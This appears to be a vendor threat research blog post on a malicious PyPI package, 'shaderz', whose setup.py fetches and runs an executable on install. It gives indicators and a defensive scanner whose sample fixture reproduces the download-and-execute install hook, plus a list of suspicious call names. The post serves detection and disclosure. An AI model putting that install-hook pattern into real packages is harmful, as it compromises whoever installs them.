FortiGuard Labs Threat Research

Supply Chain Attack via New Malicious Python Package, “shaderz” (Part 1)

By Jin Lee | December 08, 2022

Our Fortinet Advanced Research Team recently discovered a previously unreported (0-day) malicious package on PyPI (the Python Package Index) called “shaderz”. It was found on December 6, 2022, through a system we use to monitor open-source ecosystems. The package was published on December 2, 2022, as shown on its official PyPI page. Our suspicions were initially raised because it has only one published version, 0.0.1, and provides no meaningful description of the package, no author email, and no link to a source repository.

Figure 1: Blank project description

Figure 2: Release history

The package includes malicious code in its setup.py installation script that downloads and runs an executable file as part of its installation.

Figure 3: setup.py script
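As an added illustration of how a defender can triage a package like this before installing it (example code written for this article, not FortiGuard tooling), the following scanner parses a setup.py with Python's ast module and flags install-time downloads, process execution and cmdclass install hooks. The sample setup.py is a constructed fixture that mirrors the pattern described above; its URL is a placeholder, not the real one.

```python
import ast
import re

# Install-time network fetches and process execution have no place in setup.py.
# Matched on the full dotted name or on its last attribute, so both
# "urllib.request.urlretrieve" and a bare imported "urlretrieve" are caught.
SUSPICIOUS_CALLS = {
    "urlretrieve", "urlopen", "requests.get", "subprocess.run",
    "subprocess.Popen", "subprocess.call", "os.system", "os.startfile", "exec",
}
URL_RE = re.compile(r"https?://[^\s'\"]+")

def _dotted_name(node: ast.AST) -> str:
    # Render a call target such as subprocess.run as a dotted string.
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        return f"{_dotted_name(node.value)}.{node.attr}"
    return ""

def scan_setup_py(source: str) -> list:
    """Return human-readable findings for download-and-execute behaviour."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUSPICIOUS_CALLS or name.rsplit(".", 1)[-1] in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: call to {name}")
            # cmdclass is how setup.py hooks arbitrary code into "pip install".
            if name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                findings.append(f"line {node.lineno}: setup() overrides install via cmdclass")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for url in URL_RE.findall(node.value):
                findings.append(f"line {node.lineno}: hard-coded URL {url}")
    return findings

# Constructed fixture mirroring the pattern described above (fetch a binary at
# install time, then run it); the URL is a placeholder, not the real one.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
from urllib.request import urlretrieve
import subprocess
class PostInstall(install):
    def run(self):
        install.run(self)
        urlretrieve("https://cdn.example.invalid/stub.exe", "stub.exe")
        subprocess.run(["stub.exe"])
setup(name="demo", version="0.0.1", cmdclass={"install": PostInstall})
'''
```

Run it over the sdist's setup.py before installation; any finding is a reason to inspect the package by hand rather than let pip execute it.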

One particularly interesting element is the URL, which requires deeper analysis: https://cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub.exe.

As shown in the VirusTotal entry below, the download URL serves the following executable (SHA-256): 33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d.

While this download URL had not previously been flagged by any other threat researchers, several vendors do flag the downloaded executable as malicious.

Figure 4: This URL has not been detected by VirusTotal

Figure 5: Vendors that detect the downloaded executable

The downloaded executable appears to be a Python script compiled into an executable file. We will share more details of our analysis of this file in our next post.

We will continue to monitor and help organizations defend against malicious packages found in the wild like this one to help protect our customers against attacks from unknown sources. For more detail, read part 2 of this blog.

Fortinet Protections

FortiGuard AntiVirus detects the malicious executable identified in this report as W32/PossibleThreat.

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects as malicious and blocks the download URL cited in this report.

IOCs

shaderz-0.0.1[.]tar[.]gz

fd9f944fafb58faf783fdf4f8638d281a429b84cdb119756e6d7d92b31a079de

stub.exe

33df1d9c50a9bd9d3e71dc61c0a7f41f7ca51612e9c3babcea927adde169e62d

Malicious URLs

cdn[.]discordapp[.]com/attachments/1045000289708687390/1045159487079723058/stub[.]exe
